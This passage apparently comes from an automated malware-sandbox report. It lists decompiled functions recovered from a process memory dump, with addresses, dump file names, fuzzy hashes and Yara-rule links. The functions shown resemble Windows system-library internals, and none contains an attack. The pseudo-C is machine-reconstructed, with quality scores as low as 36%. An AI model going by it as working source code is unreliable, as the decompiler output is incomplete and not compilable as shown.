				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x50bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04FE7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0500B640(E05009AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05098f6a
0x05098f79
0x05098f81
0x05098f84
0x05098f8b
0x05098f91
0x05098f94
0x05098f9e
0x05098fb0
0x05098fa0
0x05098fa9
0x05098fa9
0x05098fbb
0x05098fbc
0x05098fbe
0x05098fc3
0x05098fd6

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebb6e04369763b3ce13d8deb028b06559ddc0f5c31b9a05d0193d64f366c473
Instruction ID: d0e9215711126206fd4568bb52b122ac02e5ee4e4c39efcf22af683bbeb6ffe1
Opcode Fuzzy Hash: 9ebb6e04369763b3ce13d8deb028b06559ddc0f5c31b9a05d0193d64f366c473
Instruction Fuzzy Hash: 77014475A0420CAFDB04EFA9E545AAEB7F4FF18300F108459B905EB381DA74DA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0508131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0508131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x50bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04FE7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0500B640(E05009AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0508131b
0x0508132a
0x05081330
0x05081336
0x0508133e
0x05081341
0x05081344
0x0508134f
0x05081361
0x05081351
0x0508135a
0x0508135a
0x0508136c
0x0508136d
0x0508136f
0x05081374
0x05081387

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f71d3f81be9d88163704189410b6841575d5fbf78541fd5d79379bed7a69b7
Instruction ID: e2261921377d501cf7217f28d44142074bc7a4c97d66806bcf72f80a53a622eb
Opcode Fuzzy Hash: f9f71d3f81be9d88163704189410b6841575d5fbf78541fd5d79379bed7a69b7
Instruction Fuzzy Hash: 53013171E0520CAFDB14EFA9E545AAEB7F4FF18700F004059B945EB381E674DA01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05081608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E05081608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x50bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04FE7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0500B640(E05009AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x05081608
0x05081617
0x0508161d
0x05081625
0x05081628
0x0508162b
0x05081636
0x05081648
0x05081638
0x05081641
0x05081641
0x05081653
0x05081654
0x05081656
0x0508165b
0x0508166e

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25dba9546649db993b6251d4427542ae2400edad76cbb46dd9ea202e0f5674cc
Instruction ID: 2bf0c3b2104d4a563f3783766ec04d6d52de30be5860fb775c4fe7787cd83023
Opcode Fuzzy Hash: 25dba9546649db993b6251d4427542ae2400edad76cbb46dd9ea202e0f5674cc
Instruction Fuzzy Hash: 4AF06271A04258EFDB14EFA9E445EAEB7F4EF14300F044069B945EB381EA34D901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04FEC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FEC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04FEC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4fa11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E050988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x04fec577
0x04fec57d
0x04fec581
0x04fec5b5
0x04fec5b9
0x04fec5ce
0x04fec5ce
0x04fec5ca
0x00000000
0x04fec5ca
0x04fec5c4
0x04fec5c8
0x00000000
0x00000000
0x00000000
0x04fec5ad
0x00000000
0x04fec5af

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d287512325007ba632e751b9368a47c94bb0f8dd3e28ce0164d93879de268803
Instruction ID: 48b16ccf5a67fe4e638147a0197adc086e363fdbd29a9ba7d6143217a77c2a96
Opcode Fuzzy Hash: d287512325007ba632e751b9368a47c94bb0f8dd3e28ce0164d93879de268803
Instruction Fuzzy Hash: 40F09AB3E157D09EE7368F2A8408B727BE89B05772F558466F51687201C6A4F882C252

Uniqueness

Uniqueness Score: -1.00%

Function 05098D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05098D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x50bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04FE7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0500B640(E05009AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05098d34
0x05098d43
0x05098d4b
0x05098d4e
0x05098d52
0x05098d5c
0x05098d6e
0x05098d5e
0x05098d67
0x05098d67
0x05098d79
0x05098d7a
0x05098d7c
0x05098d81
0x05098d94

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9af6b71f26bdbc535a106672985533aaad63293d897bc6bcdee145ffcbd4b5
Instruction ID: 600563661177fe14ba9f1f9eb057c1d00471aec10793dcf8f3a55d09caafaf9e
Opcode Fuzzy Hash: ce9af6b71f26bdbc535a106672985533aaad63293d897bc6bcdee145ffcbd4b5
Instruction Fuzzy Hash: DDF0B470A0460CAFDB14EFB8E445BAEB7B4EF54700F108099E905EB381EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 05082073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05082073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0507FD22(__ecx);
				_t19 =  *0x50b849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x50b8748; // 0x0
					if(__eflags <= 0) {
						E05081C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x50b8724 & 0x00000004;
							if(( *0x50b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x50b8724; // 0x0
					return E05078DF1(__ebx, 0xc0000374, 0x50b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05082076
0x05082078
0x0508207d
0x05082083
0x050820a4
0x050820aa
0x050820ac
0x050820b7
0x050820ba
0x050820bc
0x050820c9
0x050820c9
0x050820d0
0x050820d2
0x00000000
0x050820d2
0x050820be
0x050820c3
0x050820c5
0x050820c7
0x00000000
0x00000000
0x050820c7
0x050820bc
0x050820d4
0x05082085
0x05082085
0x050820a3
0x050820a3

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbf5ac4fa3fba0875515cc6d7f3062968a1541a27e0887d0df9d0ae5300e958
Instruction ID: 334cc197ad16cedae06097f7d40cbe0d4deeb63181b788df4ea426d3ad237b9c
Opcode Fuzzy Hash: 9dbf5ac4fa3fba0875515cc6d7f3062968a1541a27e0887d0df9d0ae5300e958
Instruction Fuzzy Hash: 79F0273E9255864AFE727F647546AFE2FD5EF45114B194081E4D227202C9388983CE14

Uniqueness

Uniqueness Score: -1.00%

Function 0500927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0500927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0500FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E050092C6(_t11, _t14);
				}
				return _t11;
			}

0x05009295
0x05009299
0x0500929f
0x050092aa
0x050092ad
0x050092ae
0x050092af
0x050092b0
0x050092b4
0x050092bb
0x050092bb
0x050092c5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 101b1bad85e7fa053b4c3f098dcfc472d4252192318c7ade9c473581bf2dcf2f
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 8DE0ED723406006BEB219E0AEC84B5B77A9AF82721F044078B9005F282CAE6D80987A0

Uniqueness

Uniqueness Score: -1.00%

Function 04FE746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04FE746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04FDEB70(__ecx, 0x50b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E050095D0();
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x04fe746d
0x04fe746d
0x04fe746d
0x04fe7471
0x04fe7488
0x0502f92d
0x04fe748e
0x04fe7491
0x04fe7495
0x0502f937
0x0502f93a
0x0502f94e
0x0502f953
0x0502f956
0x0502f956
0x04fe7495
0x00000000
0x04fe7488
0x04fe7473
0x04fe7478
0x04fe747d
0x04fe7481
0x00000000
0x04fe7481
0x04fe747d
0x04fe747a
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189ccd4531ea7db81e03cf854f0986526716001d8920c68859c5a8abf6e28a4b
Instruction ID: eea1094e065b4a936a14516fca857201405bb543fe874d27a95e6730de761e4c
Opcode Fuzzy Hash: 189ccd4531ea7db81e03cf854f0986526716001d8920c68859c5a8abf6e28a4b
Instruction Fuzzy Hash: 85F0E935A06145EAEF11FB69D840F7FBBF1AF04356F040555E851AB160F765B803C785

Uniqueness

Uniqueness Score: -1.00%

Function 05098CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05098CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x50bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04FE7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0500B640(E05009AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05098ce5
0x05098ced
0x05098cf0
0x05098cfb
0x05098d0d
0x05098cfd
0x05098d06
0x05098d06
0x05098d18
0x05098d19
0x05098d1b
0x05098d20
0x05098d33

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94c3028b973ba4c26e900e0a7ca4c47e673e568360751ecba6d40abca331ae1
Instruction ID: d8f596156afc3ce2b84888af2c793f6e67cfd57d07d27104ca5dbcbfe2477dd3
Opcode Fuzzy Hash: d94c3028b973ba4c26e900e0a7ca4c47e673e568360751ecba6d40abca331ae1
Instruction Fuzzy Hash: 66F08270A09608ABDB04EBA9E94AEAE77B4EF59204F104199F916EB3C1EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 04FC4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FC4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E050988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04FEC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4fa1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04fc4f2e
0x04fc4f34
0x04fc4f38
0x05020b85
0x05020b85
0x05020b89
0x05020b9a
0x05020b9a
0x05020b9f
0x00000000
0x05020b9f
0x05020b94
0x05020b98
0x00000000
0x00000000
0x00000000
0x05020b98
0x04fc4f3e
0x04fc4f48
0x00000000
0x04fc4f6e
0x00000000
0x04fc4f70

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea5d2c1f6c7a02b5c1fa68ecd3d5e91051abd6883986c0f6f784b96113dd99aa
Instruction ID: 7e8693e29301e5866ad372a8af91fb15e2ba7ba389ee691285cc15b2d7f71afd
Opcode Fuzzy Hash: ea5d2c1f6c7a02b5c1fa68ecd3d5e91051abd6883986c0f6f784b96113dd99aa
Instruction Fuzzy Hash: A2F0E2365257A88FD7B2C718E268F3AB7DABF01778F058464D406C7A20C724EC40C680

Uniqueness

Uniqueness Score: -1.00%

Function 05098B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05098B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x50bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04FE7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0500B640(E05009AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05098b67
0x05098b6f
0x05098b72
0x05098b7d
0x05098b8f
0x05098b7f
0x05098b88
0x05098b88
0x05098b9a
0x05098b9b
0x05098b9d
0x05098ba2
0x05098bb5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24a0c12d012dff0d8b82f9734e00601906f1bf51a2c00494730e5c91eadd6ba
Instruction ID: ee272469f64c9ae92b00a3a5f6a40abf908c1bb30d2f1d001cf5e1a7892516c2
Opcode Fuzzy Hash: d24a0c12d012dff0d8b82f9734e00601906f1bf51a2c00494730e5c91eadd6ba
Instruction Fuzzy Hash: 05F082B1A14258ABEB14EBA8E906EBEB7B8EF04704F040459BA05DB3C1EA74D901C794

Uniqueness

Uniqueness Score: -1.00%

Function 04FFA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FFA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x50b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0500FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x04ffa44b
0x04ffa453
0x04ffa472
0x04ffa476
0x00000000
0x04ffa493
0x04ffa47a
0x04ffa47f
0x04ffa486
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5986273672387e2029330b8fdf44987a31d9030e6f2e99d99c1e7696fd92e8c
Instruction ID: 843bc33fd3269de4e3b157978e96e865474d3e6558b2bbdbbe8ef1188a4cae71
Opcode Fuzzy Hash: a5986273672387e2029330b8fdf44987a31d9030e6f2e99d99c1e7696fd92e8c
Instruction Fuzzy Hash: 9EE09272F01421ABE2215F18BC00FABB3ADDFE5651F094039F608C7260DA28ED02C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04FCF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04FCF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04FFF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04FE4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x04fcf35d
0x04fcf361
0x04fcf367
0x04fcf372
0x04fcf38c
0x04fcf38c
0x04fcf394

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 85e4971683cc68b22336101b3cb8462967def2da018ab2f9dc35b41c997c8f3f
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 6EE0D832A40118FBDB3196D99E05FAAFBADDB44B61F00015AB904DB1D0D561AD01C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 04FDFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FDFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4fa11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E050988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04FE0050(_t14);
				}
			}

0x04fdff66
0x04fdff6b
0x00000000
0x04fdff8f
0x00000000
0x04fdff8f

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756da62c951d7bfb9a79c1b3dfd24e45d477382a6094f5a14d3018fb9ff79264
Instruction ID: 54fbd1847699bbc42e098130527d2e51dafe48bfeb64bf1fe3e3a759a3630ff3
Opcode Fuzzy Hash: 756da62c951d7bfb9a79c1b3dfd24e45d477382a6094f5a14d3018fb9ff79264
Instruction Fuzzy Hash: 51E0DFB1A052049FEB3CDB52D144F2E379E9F42729F1E821EE00A4B105C621F883C266

Uniqueness

Uniqueness Score: -1.00%

Function 050541E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E050541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x50a08f0);
				_t5 = E0501D08C(__ebx, __edi, __esi);
				if( *0x50b87ec == 0) {
					E04FDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x50b87ec == 0) {
						 *0x50b87f0 = 0x50b87ec;
						 *0x50b87ec = 0x50b87ec;
						 *0x50b87e8 = 0x50b87e4;
						 *0x50b87e4 = 0x50b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05054248();
				}
				return E0501D0D1(_t5);
			}

0x050541e8
0x050541ea
0x050541ef
0x050541fb
0x05054206
0x0505420b
0x05054216
0x0505421d
0x05054222
0x0505422c
0x05054231
0x05054231
0x05054236
0x0505423d
0x0505423d
0x05054247

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400e57e1fb9cedd1060fb1a056354d01a32fd7ec7714fa9d68de4568b14dd018
Instruction ID: 2b3726da443748bd51301d12ec20b62703110a921f2c2828aef40be3fc21e953
Opcode Fuzzy Hash: 400e57e1fb9cedd1060fb1a056354d01a32fd7ec7714fa9d68de4568b14dd018
Instruction Fuzzy Hash: 02F012755A0700CEEB90DFA4E6897EC3ABDFB4432AF90C195A500A7264CB788482CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0507D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0507D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04FCE8B0(__ecx, _a4, 0xfff);
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0507d38a
0x0507d39b
0x0507d3b1
0x00000000
0x0507d3b6
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 8623789adefa34f4874e993c0a2456a574b544bd31315e8d8d95d259c4363439
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 98E0C232280248BBEB326E44DC00F7D7B56EF407A5F104035FE085A690C675AC92D6C8

Uniqueness

Uniqueness Score: -1.00%

Function 04FFA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FFA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x50b67e4 >= 0xa) {
					if(_t5 < 0x50b6800 || _t5 >= 0x50b6900) {
						return L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04FE0010(0x50b67e0, _t5);
				}
			}

0x04ffa190
